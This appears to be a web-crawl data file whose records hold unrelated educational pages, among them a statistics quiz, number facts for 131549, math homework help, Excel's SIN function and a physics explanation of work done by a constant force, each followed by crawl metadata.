statistics.\n\nCongratulations, your level in basic statistics is sufficient to undertake more advanced training. Please complete this short questionnaire for some more advanced analytical methods.\n\nFill out the MSG2 MCQ to complete your assessment:\n\n 1. We wish to compare the means of 2 samples, with a risk of 5%. The calculated p-value is 0.231 (23.1%). In this case: a. We do not reject the null hypothesis, which is H0: m1 = m2 b. We do not reject the null hypothesis, which is H0: m1 ≠ m2 c. We reject the null hypothesis, and we retain the alternative hypothesis, which is H1: m1 = m2 d. We reject the null hypothesis, and we retain the alternative hypothesis which is H1: m1 ≠ m2 2. We wish to compare the means of 2 samples, with a risk of 5%. The calculated p-value is 0.231 (23.1%). How to formulate the conclusion? a. The statistical test shows equality between the means, with a risk of error lower than 5%. b. The statistical test does not reveal any differences between the means at the 5% level c. The statistical test shows a difference between the means, with a risk of error lower than 5%. d. The statistical test does not show equality between the means at the 5% threshold. 3. Biological measurements are made on the same patient before and after the application of a treatment. In statistics, the measurements are called: a. Paired b. Independent c. Jointed 4. . What is the name of the test in which H0: m1 < m2 versus H1: m1 > m2: a. The equivalence test for inferiority b. The one-tailed comparison test c. The signs test 5. We wish to compare the average marks obtained during an exam by students from 2 different schools, which statistical test should be applied? a. Fisher’s test b. Bartlett’s test c. The T-test, paired Student’s t test d. The T-test, independent Student’s t test e. The Chi-2 test f. Shapiro-Wilk’s test g. An ANOVA h. A Regression 6. We wish to compare the average marks obtained during an exam by students from 5 different schools, which statistical test should be applied? a. Fisher’s test b. Bartlett’s test c. The T-test, paired Student’s t test d. The T-test, independent Student’s t test e. The Chi-2 test f. Shapiro-Wilk’s test g. an ANOVA h. a Regression"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8534983,"math_prob":0.95742327,"size":4505,"snap":"2021-43-2021-49","text_gpt3_token_len":1191,"char_repetition_ratio":0.12797156,"word_repetition_ratio":0.24025974,"special_character_ratio":0.27436182,"punctuation_ratio":0.16597077,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9956368,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-18T23:46:40Z\",\"WARC-Record-ID\":\"<urn:uuid:a190306a-6192-411c-a751-01c352eb4057>\",\"Content-Length\":\"157140\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:94ba0570-d146-4d45-83ec-62fdfc9f295f>\",\"WARC-Concurrent-To\":\"<urn:uuid:976c0206-2e27-4756-9197-2c7fd25ad924>\",\"WARC-IP-Address\":\"79.137.33.143\",\"WARC-Target-URI\":\"https://www.soladisinstitute.fr/en/evaluation/\",\"WARC-Payload-Digest\":\"sha1:IA5ADYOUKNN3ZSAKGBAGV22BSGBTDA7N\",\"WARC-Block-Digest\":\"sha1:KBO4QS2CLX562EIZWKZE5LT3CQEOIPN6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585215.14_warc_CC-MAIN-20211018221501-20211019011501-00497.warc.gz\"}"} |
https://metanumbers.com/131549 | [
"# 131549 (number)\n\n131,549 (one hundred thirty-one thousand five hundred forty-nine) is an odd six-digits composite number following 131548 and preceding 131550. In scientific notation, it is written as 1.31549 × 105. The sum of its digits is 23. It has a total of 2 prime factors and 4 positive divisors. There are 119,580 positive integers (up to 131549) that are relatively prime to 131549.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 6\n• Sum of Digits 23\n• Digital Root 5\n\n## Name\n\nShort name 131 thousand 549 one hundred thirty-one thousand five hundred forty-nine\n\n## Notation\n\nScientific notation 1.31549 × 105 131.549 × 103\n\n## Prime Factorization of 131549\n\nPrime Factorization 11 × 11959\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 2 Total number of prime factors rad(n) 131549 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 131,549 is 11 × 11959. Since it has a total of 2 prime factors, 131,549 is a composite number.\n\n## Divisors of 131549\n\n4 divisors\n\n Even divisors 0 4 2 2\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 4 Total number of the positive divisors of n σ(n) 143520 Sum of all the positive divisors of n s(n) 11971 Sum of the proper positive divisors of n A(n) 35880 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 362.697 Returns the nth root of the product of n divisors H(n) 3.66636 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 131,549 can be divided by 4 positive divisors (out of which 0 are even, and 4 are odd). The sum of these divisors (counting 131,549) is 143,520, the average is 35,880.\n\n## Other Arithmetic Functions (n = 131549)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 119580 Total number of positive integers not greater than n that are coprime to n λ(n) 59790 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 12259 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 119,580 positive integers (less than 131,549) that are coprime with 131,549. And there are approximately 12,259 prime numbers less than or equal to 131,549.\n\n## Divisibility of 131549\n\n m n mod m 2 3 4 5 6 7 8 9 1 2 1 4 5 5 5 5\n\n131,549 is not divisible by any number less than or equal to 9.\n\n## Classification of 131549\n\n• Arithmetic\n• Semiprime\n• Deficient\n\n### Expressible via specific sums\n\n• Polite\n• Non-hypotenuse\n\n• Square Free\n\n### Other numbers\n\n• LucasCarmichael\n\n## Base conversion (131549)\n\nBase System Value\n2 Binary 100000000111011101\n3 Ternary 20200110012\n4 Quaternary 200013131\n5 Quinary 13202144\n6 Senary 2453005\n8 Octal 400735\n10 Decimal 131549\n12 Duodecimal 64165\n20 Vigesimal g8h9\n36 Base36 2ti5\n\n## Basic calculations (n = 131549)\n\n### Multiplication\n\nn×y\n n×2 263098 394647 526196 657745\n\n### Division\n\nn÷y\n n÷2 65774.5 43849.7 32887.2 26309.8\n\n### Exponentiation\n\nny\n n2 17305139401 2276473783062149 299467849688042638801 39394696158612321091632749\n\n### Nth Root\n\ny√n\n 2√n 362.697 50.8584 19.0446 10.5637\n\n## 131549 as geometric shapes\n\n### Circle\n\n Diameter 263098 826547 5.43657e+10\n\n### Sphere\n\n Volume 9.53567e+15 2.17463e+11 826547\n\n### Square\n\nLength = n\n Perimeter 526196 1.73051e+10 186038\n\n### Cube\n\nLength = n\n Surface area 1.03831e+11 2.27647e+15 227850\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 394647 7.49335e+09 113925\n\n### Triangular Pyramid\n\nLength = n\n Surface area 2.99734e+10 2.68285e+14 107409\n\n## Cryptographic Hash Functions\n\nmd5 8c3bce39ca977e0f872b6d9fb3be8cfb 7af2573019c1cdc383b44f3d2d8f15b7d3db75ba b507435e416d62a9efb1ded418dc643b2a141786c00205f26cc276e63890bf58 65889f169cc8b106f8179b78bac0a8087ad0275c30f3ff6bb1fbcbe86366d8e5eebf7fc040b5a72c6e5d0c511601520f17f6924595134fbe8d69ae272b60fd30 f514b266c44d52ae5136e7e27ba3de3b36deb27f"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.6104349,"math_prob":0.97534734,"size":4684,"snap":"2021-31-2021-39","text_gpt3_token_len":1640,"char_repetition_ratio":0.119444445,"word_repetition_ratio":0.03211679,"special_character_ratio":0.45239112,"punctuation_ratio":0.074589126,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.995363,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-24T06:10:39Z\",\"WARC-Record-ID\":\"<urn:uuid:f9fd64a9-4b76-4a70-b9e9-ca6d4236fc38>\",\"Content-Length\":\"40105\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:083f26e5-d654-4944-b4b4-b4429ce01b1e>\",\"WARC-Concurrent-To\":\"<urn:uuid:e3893cc6-854a-46a9-873e-01c990922988>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/131549\",\"WARC-Payload-Digest\":\"sha1:IEU5FQVJIJ2LC6FMO3HF4ETUO57CRHXW\",\"WARC-Block-Digest\":\"sha1:ERW5IVQRYKXEBLVHKKALZRNF6IDVGLYH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057504.60_warc_CC-MAIN-20210924050055-20210924080055-00258.warc.gz\"}"} |
https://www.jiskha.com/questions/1074259/i-am-familiar-with-finding-the-vertex-of-a-polynomial-but-i-dont-know-how-to-solve-this | [
"# Math-Circles\n\nI am familiar with finding the vertex of a polynomial but I don't know how to solve this equation.\nGive the vertex of x^2+9\ncan you please explain in steps?\nThank you.\n\n1. 👍 0\n2. 👎 0\n3. 👁 103\n1. An equation requires an equal sign.\n\n1. 👍 0\n2. 👎 0\nposted by PsyDAG\n2. If you mean\n\ny = x^2+9\n\nyou can see that since x^2 can never be less than zero, the vertex is at x=0. Since y=9 there, the vertex is at (0,9)\n\nOr, recalling that the vertex of\n\ny = (x-h)^2 + k\n\nis at (h,k), note that we have h=0 and k=9.\n\n1. 👍 0\n2. 👎 0\nposted by Steve\n\n## Similar Questions\n\n1. ### algebra\n\nsolve the polynomial y=2x^2-4x+1 For Further Reading algebra - Reiny, Thursday, May 17, 2007 at 10:34pm I am sure neither your text nor your teacher asked you to \"solve the polynomial y=2x^2-4x+1 \" are you graphing the function,\n\nasked by Haylee on May 18, 2007\n2. ### Algebra II\n\nState the vertex of the graph: y=2x-6x+9 ...the 2x is squared. y = 2x^2 -6x + 9 The vertex is where the function is a minimum. That would be where dy/dx = 4x -6 = 0 x= 3/2 If you are not familiar with calculus, then rewrite the\n\nasked by Kate on March 29, 2007\n3. ### Algebra\n\nWrite an equation for the translation so the graph has the given vertex. 1. y=-|x| vertex (-5,0) 2. y=2|x| vertex (-4,3) 3. y=-|x| vertex (p,q) I really have no idea how to even begin these, but I do know the answer to # 2 is\n\nasked by Josie on October 5, 2006\n4. ### Math\n\nI need help in finding the vertex of a parabola using an equation in this form: Ax^2 + Bx+C I have a test on this tomorrow. For example: 3x^2 +1x - 2 How would I find the vertex in this?\n\nasked by Clair on December 8, 2009\n5. ### Math - Trigonometry\n\nLet f(x) be a polynomial such that f(cos theta) = cos(4 theta) for all \\theta. Find f(x). (This is essentially the same as finding cos(4 theta) in terms of cos theta; we structure the problem this way so that you can answer as a\n\nasked by Sam on November 6, 2013\n1. ### algebra\n\n1)Find the exact solutions to 3x^2=5x-1 using the quadratic formula. answer=5 plus or minus the square root of 37 over 6 2)Use the discriminant to determine the number and type of roots for the equation 2x^2-7x+9=0 answer=2\n\nasked by Marissa on August 14, 2007\n2. ### Math-precalc\n\nIs it possible to find a rational function that has x-intercepts (-2,0) and (2,0), but has vertical asymptote x=1 and horizontal asymptote of y=0? The horizontal asymptote and the x-intercepts parts stump me. If you can't reach\n\nasked by Pamela on July 7, 2007\n3. ### Algebra\n\nIdentify the vertex and the axis of symmetry for the graph of y=5(x-2)^2 + 3. a) vertex (2,3); x = -2 b) vertex (-2,-3); x = 2 c) vertex (2,3); x = 2 d) vertex (-2,-3); x = -2 I have no idea how to solve this problem! Please help.\n\nasked by Cassie on June 6, 2009\n4. ### Algebra Functions\n\nI cannot for the life of me remember how to do this- Find the vertex of the graphs of the functions: Function #1: y=(x-4)(x+2) AND Function #2: y=2x^2-4x+1 Can someone help me get it PLz! OK - to find the vertex of these functions\n\nasked by natalie on January 4, 2007\n5. ### Precalculus(Please check and help)\n\nFind the Equation. Please check the answers and help. Thanks! 1.) Ellipse with center (0,0), foci on x-axis; x intercepts; major axis of length 12, minor acis of length 8. I got : x^2/144 + y^2/64 = 1 2.) A parabola with vertex\n\nasked by Ram on May 1, 2016\n\nMore Similar Questions"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.89669216,"math_prob":0.9776818,"size":2828,"snap":"2020-10-2020-16","text_gpt3_token_len":965,"char_repetition_ratio":0.12818697,"word_repetition_ratio":0.021857923,"special_character_ratio":0.3373409,"punctuation_ratio":0.10785824,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99975544,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-03-30T03:33:34Z\",\"WARC-Record-ID\":\"<urn:uuid:7c0e297c-6a0f-4bf3-93be-5fab7f816c66>\",\"Content-Length\":\"23491\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0fba400c-ba89-4672-9607-6b273e226add>\",\"WARC-Concurrent-To\":\"<urn:uuid:d50bc183-7b0a-48ff-8e1c-3f4a9612f289>\",\"WARC-IP-Address\":\"66.228.55.50\",\"WARC-Target-URI\":\"https://www.jiskha.com/questions/1074259/i-am-familiar-with-finding-the-vertex-of-a-polynomial-but-i-dont-know-how-to-solve-this\",\"WARC-Payload-Digest\":\"sha1:XDCWEUO6FX4QYYDJS74GUNFZQJB4TIKM\",\"WARC-Block-Digest\":\"sha1:DR7AAM5BVGEOYYXNS3YCSR6FW54VE76Z\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370496523.5_warc_CC-MAIN-20200330023050-20200330053050-00091.warc.gz\"}"} |
https://www.projecteuclid.org/journals/proceedings-of-the-japan-academy-series-a-mathematical-sciences/volume-76/issue-2/On-the-Diophantine-equation-xx--1-dotsm-x-/10.3792/pjaa.76.16.full | [
"Feb. 2000 On the Diophantine equation $x(x + 1) \\dotsm (x + n) + 1 = y^2$\nNobuhisa Abe\nProc. Japan Acad. Ser. A Math. Sci. 76(2): 16-17 (Feb. 2000). DOI: 10.3792/pjaa.76.16\n\n## Abstract\n\nLet $\\mathbf{N}$ denote the set of natural numbers $\\{1, 2, 3, \\ldots\\}$. $n$ being an odd natural number, we consider the Diophantine equation as mentioned in the title and solve it completely for $n \\leq 15$, i.e. find all $(x,y) \\in \\mathbf{N}^2$ satisfying this equation.\n\n## Citation\n\nNobuhisa Abe. \"On the Diophantine equation $x(x + 1) \\dotsm (x + n) + 1 = y^2$.\" Proc. Japan Acad. Ser. A Math. Sci. 76 (2) 16 - 17, Feb. 2000. https://doi.org/10.3792/pjaa.76.16\n\n## Information\n\nPublished: Feb. 2000\nFirst available in Project Euclid: 23 May 2006\n\nzbMATH: 0996.11022\nMathSciNet: MR1752817\nDigital Object Identifier: 10.3792/pjaa.76.16\n\nSubjects:\nPrimary: 11D\n\nKeywords: Diophantine equation",
null,
""
] | [
null,
"https://www.projecteuclid.org/images/journals/cover_pja.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.63816994,"math_prob":0.9779286,"size":484,"snap":"2023-40-2023-50","text_gpt3_token_len":176,"char_repetition_ratio":0.10208333,"word_repetition_ratio":0.0,"special_character_ratio":0.37396693,"punctuation_ratio":0.21929824,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9974466,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-29T18:57:12Z\",\"WARC-Record-ID\":\"<urn:uuid:cdc5f784-1553-42af-bacc-ccb725b4701b>\",\"Content-Length\":\"135082\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c8d692c-b3b9-4503-9a1c-14b9f7a1531b>\",\"WARC-Concurrent-To\":\"<urn:uuid:138e4135-185d-46fd-adf5-d018c913f8a6>\",\"WARC-IP-Address\":\"107.154.79.145\",\"WARC-Target-URI\":\"https://www.projecteuclid.org/journals/proceedings-of-the-japan-academy-series-a-mathematical-sciences/volume-76/issue-2/On-the-Diophantine-equation-xx--1-dotsm-x-/10.3792/pjaa.76.16.full\",\"WARC-Payload-Digest\":\"sha1:NCQQLER7N3DA7OEDH6QOGP7JJMHWLT6M\",\"WARC-Block-Digest\":\"sha1:OGPYKP2CJIEUI4UYKMCPKNBJQOMWGMCK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100135.11_warc_CC-MAIN-20231129173017-20231129203017-00398.warc.gz\"}"} |
https://support.microsoft.com/en-us/office/sin-function-83163832-688f-4ae5-affc-e3c385b09228?ocmsassetid=ha001161065&queryid=0bd7df57-e635-4f0a-9bbb-3b0bddaea6c9&respos=48&ctt=1&correlationid=8ec29154-eaaa-4ca2-bcee-63b02e6bee20&ui=en-us&rs=en-us&ad=us | [
"Returns the sine of the given angle.\n\n## Syntax\n\nSIN(number)\n\nNumber is the angle in radians for which you want the sine.\n\n## Remark\n\nIf your argument is in degrees, multiply it by PI()/180 or use the RADIANS function to convert it to radians.\n\n## Examples\n\n Formula Description (Result) =SIN(PI()) Sine of pi radians (0, approximately) =SIN(PI()/2) Sine of pi/2 radians (1) =SIN(30*PI()/180) Sine of 30 degrees (0.5) =SIN(RADIANS(30)) Sine of 30 degrees (0.5)"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.70012647,"math_prob":0.99348974,"size":463,"snap":"2021-31-2021-39","text_gpt3_token_len":144,"char_repetition_ratio":0.16557734,"word_repetition_ratio":0.077922076,"special_character_ratio":0.3412527,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.999696,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-24T21:22:10Z\",\"WARC-Record-ID\":\"<urn:uuid:c7dc15ec-864e-42a1-8474-1ea09f480995>\",\"Content-Length\":\"108568\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5acd928e-3167-4cfc-8dbe-6f3e5da65cb9>\",\"WARC-Concurrent-To\":\"<urn:uuid:c160cf2f-75a3-4c97-9a43-517173bab6a9>\",\"WARC-IP-Address\":\"23.62.164.116\",\"WARC-Target-URI\":\"https://support.microsoft.com/en-us/office/sin-function-83163832-688f-4ae5-affc-e3c385b09228?ocmsassetid=ha001161065&queryid=0bd7df57-e635-4f0a-9bbb-3b0bddaea6c9&respos=48&ctt=1&correlationid=8ec29154-eaaa-4ca2-bcee-63b02e6bee20&ui=en-us&rs=en-us&ad=us\",\"WARC-Payload-Digest\":\"sha1:VOI44ZNIFA2AY22C6J42B3JUBNKSNEEJ\",\"WARC-Block-Digest\":\"sha1:BTQZGSXI74A2NCMIL6BTIVP7RFGR6ZAB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057580.39_warc_CC-MAIN-20210924201616-20210924231616-00393.warc.gz\"}"} |
https://www.eolymp.com/en/problems/8638 | [
"",
null,
"Problems\n\n# Append three\n\nTime limit 1 second\nMemory limit 128 MiB\n\nThree digit number n is given. Append to it the digit 3 from the left and from the right.\n\n## Input data\n\nOne three digit number n.\n\n## Output data\n\nAppend to the number n the digit 3 from the left and from the right. Print the resulting number.\n\n## Examples\n\nInput example #1\n345\n\nOutput example #1\n33453\n\nInput example #2\n800\n\nOutput example #2\n38003"
] | [
null,
"https://www.eolymp.com/images/eolymp-inverse.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.64226913,"math_prob":0.98073506,"size":369,"snap":"2023-40-2023-50","text_gpt3_token_len":96,"char_repetition_ratio":0.16986302,"word_repetition_ratio":0.18461539,"special_character_ratio":0.2682927,"punctuation_ratio":0.067567565,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9827818,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-22T15:06:26Z\",\"WARC-Record-ID\":\"<urn:uuid:1bbea8f0-8eba-430e-b523-8416d53c793b>\",\"Content-Length\":\"10086\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ae305876-d8aa-42ef-8c74-3f27bace27c7>\",\"WARC-Concurrent-To\":\"<urn:uuid:de37e524-1be1-4112-a6cc-c3b3c26142ae>\",\"WARC-IP-Address\":\"3.66.181.58\",\"WARC-Target-URI\":\"https://www.eolymp.com/en/problems/8638\",\"WARC-Payload-Digest\":\"sha1:SYXLHN5FN4QFRKFE7DNT57RHVFHD255C\",\"WARC-Block-Digest\":\"sha1:2M3HJ7TNY5RCXPAZQAD243DNC6XX6ECU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506420.84_warc_CC-MAIN-20230922134342-20230922164342-00331.warc.gz\"}"} |
https://help.altair.com/flux/Flux/Help/english/Macros/english/topics/findoutcornerpoint_imax_angle_r.htm | [
"# FindOutCornerPoint_Imax_Angle.PFM\n\n## Description\n\nFind out the corner point of the torque vs speed curve starting from an unresolved Flux project.\n\n## Input\n\n• Current source\n• Value of Imax\n• Value of SpeedMin\n• Value of SpeedMax\n• The step value of the speed\n• Value of the Vrms max of the inverter\n• Solving scenario\n• The user's defined variation parameter for speed\n• The user's defined variation parameter for the angle\n• The user's defined variation parameter for the maximal current\n• Value of AngleMin\n• Value of AngleMax\n• The step value of the angle\n• The extension of the name of the file (for example \"solved\")\n\n## Output\n\n• Variation parameter containing the corresponding speed to Vrms max"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.5478315,"math_prob":0.7565061,"size":690,"snap":"2023-14-2023-23","text_gpt3_token_len":163,"char_repetition_ratio":0.18658893,"word_repetition_ratio":0.13043478,"special_character_ratio":0.20869565,"punctuation_ratio":0.018691588,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9826005,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-31T19:03:09Z\",\"WARC-Record-ID\":\"<urn:uuid:0448a8f3-59eb-4a1d-a0b5-6aa37242d468>\",\"Content-Length\":\"83917\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:35181597-8d01-478d-ada6-1f5c4c49ac85>\",\"WARC-Concurrent-To\":\"<urn:uuid:ecca5fc7-b9c3-46e8-9125-a32970889750>\",\"WARC-IP-Address\":\"173.225.177.121\",\"WARC-Target-URI\":\"https://help.altair.com/flux/Flux/Help/english/Macros/english/topics/findoutcornerpoint_imax_angle_r.htm\",\"WARC-Payload-Digest\":\"sha1:WWPRVQLQBMZ364GOOGCZCRZZ2BKDTSHM\",\"WARC-Block-Digest\":\"sha1:H22PVJNRG3XDKK4IZV6CKIQ7MXZQG7PZ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949678.39_warc_CC-MAIN-20230331175950-20230331205950-00091.warc.gz\"}"} |
https://uniteasy.com/formula/29/ | [
" Cosine of the difference of two angles formula\n\n# Cosine of the difference of two angles formula\n\ncdta\nTrigonometry\n\nCosine of the difference of two angles is equal to the product of cosine of the two angles plus the product of sine of the two angles.\n\n\\cos(\\alpha -\\beta ) = \\cos \\alpha\\cos \\beta +\\sin \\alpha \\sin \\beta\n\nor\n\nScroll to Top"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8108173,"math_prob":0.99799055,"size":224,"snap":"2021-31-2021-39","text_gpt3_token_len":64,"char_repetition_ratio":0.18181819,"word_repetition_ratio":0.0,"special_character_ratio":0.2544643,"punctuation_ratio":0.023809524,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99989045,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-23T12:32:10Z\",\"WARC-Record-ID\":\"<urn:uuid:13c42e0a-bb9d-4f9e-9347-1bb765271a8f>\",\"Content-Length\":\"9947\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e45adee7-d9e3-48b3-88ff-7b158d57e526>\",\"WARC-Concurrent-To\":\"<urn:uuid:9891c184-2867-4ff9-9c8a-27ee85440f76>\",\"WARC-IP-Address\":\"162.248.50.175\",\"WARC-Target-URI\":\"https://uniteasy.com/formula/29/\",\"WARC-Payload-Digest\":\"sha1:QYLPLY3OS2ONGWPQOX667LDCP3SPUSQS\",\"WARC-Block-Digest\":\"sha1:T6O5PB3RWDKMI5LRHGHMTSTIJQV2ZZUM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057421.82_warc_CC-MAIN-20210923104706-20210923134706-00553.warc.gz\"}"} |
https://qsstudy.com/work-done-constant-force/ | [
"Physics\n\n# Work done by a Constant Force",
null,
"Work done by a Constant Force\n\nThe work done by a constant force is proportional to the force applied times the displacement of the object. A force does not have to, and rarely does, act on an object parallel to the direction of motion.\n\nA body can be raised above or lowered down by small amount in the sphere of gravitational force. Since the height is small, so we can consider gravitational force constant. (F = mg, as g is constant, so F is constant.)\n\nThat means, if the magnitude and direction of the force is not changed, then that force is called constant force.\n\nLet a force F be applied at point A of a body along AB and due to this the body moving from point A to point B coven a distances [fig-a]. Then,\n\nWork done = magnitude of the force x magnitude of displacement along the point of action of the force\n\nor, W = F x s\n\nIf due to the application of force the displacement of the body i.e., the point of actions of the force to apposite to the direction of force i.e., AB = s [Fig-b], then,",
null,
"Work done = magnitude of the force x magnitude of displacement along the direction of the force.\n\nor, W = F x (-s) = – F x s\n\nNegative sign is used to indicate that force and displacement are opposite to each other.\n\nNow, consider that due to the action of force F on a body along direction AB, the body reaches to point C covering a distance s making an angle θ with the direction of the applied force [Fig- c]. Then displacement of the body along the line of action of the force = AB = s cos θ.\n\nHere, BC ┴ AB\n\nWork done, W = magnitude of force x magnitude of displacement along the direction of force\n\nor, W = Fs cos θ\n\n= magnitude of force x component of displacement along the line of action of the force\n\n= magnitude of displacement x component of force along the direction of force.",
null,
"Work can be expressed by vector algebra as:\n\nWork is measured by the scalar product of two vectors, force and displacement.\n\nSuppose, force F is a vector quantity and displacement ‘s’ is also a vector quantity.\n\nSo, work = force x displacement\n\nor, W = F. s\n\n= s . F = Fs cos θ,\n\n[s cos θ is the component of displacement along the direction of force, F]\n\nHere, θ = angle between F and s."
] | [
null,
"https://qsstudy.com/wp-content/uploads/2017/06/Work-done-by-a-Constant-Force.jpg",
null,
"https://qsstudy.com/wp-content/uploads/2017/06/Work-done-by-a-Constant-Force-1.jpg",
null,
"https://qsstudy.com/wp-content/uploads/2017/06/Work-done-by-a-Constant-Force-2.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9120688,"math_prob":0.99762595,"size":2162,"snap":"2023-14-2023-23","text_gpt3_token_len":505,"char_repetition_ratio":0.2089898,"word_repetition_ratio":0.10377359,"special_character_ratio":0.23681776,"punctuation_ratio":0.104575165,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99966323,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,3,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-31T05:40:40Z\",\"WARC-Record-ID\":\"<urn:uuid:4f085215-414d-468d-9ab8-97c1de099cbc>\",\"Content-Length\":\"24477\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0e62fe62-e809-4db8-b01d-94fe6deb6e15>\",\"WARC-Concurrent-To\":\"<urn:uuid:91ddf055-ef90-4ee8-bc5e-01685a74af97>\",\"WARC-IP-Address\":\"172.67.219.165\",\"WARC-Target-URI\":\"https://qsstudy.com/work-done-constant-force/\",\"WARC-Payload-Digest\":\"sha1:RMSRXCKK5YVQ5JE3KUT4ANTYOAX3OGLV\",\"WARC-Block-Digest\":\"sha1:XT27CP55WPZ6ZFVZTV7ERRBGOXS7XRWB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949573.84_warc_CC-MAIN-20230331051439-20230331081439-00217.warc.gz\"}"} |
https://chemistry.stackexchange.com/questions/91958/effect-on-rate-of-diffusion-in-addition-of-an-inert-gas | [
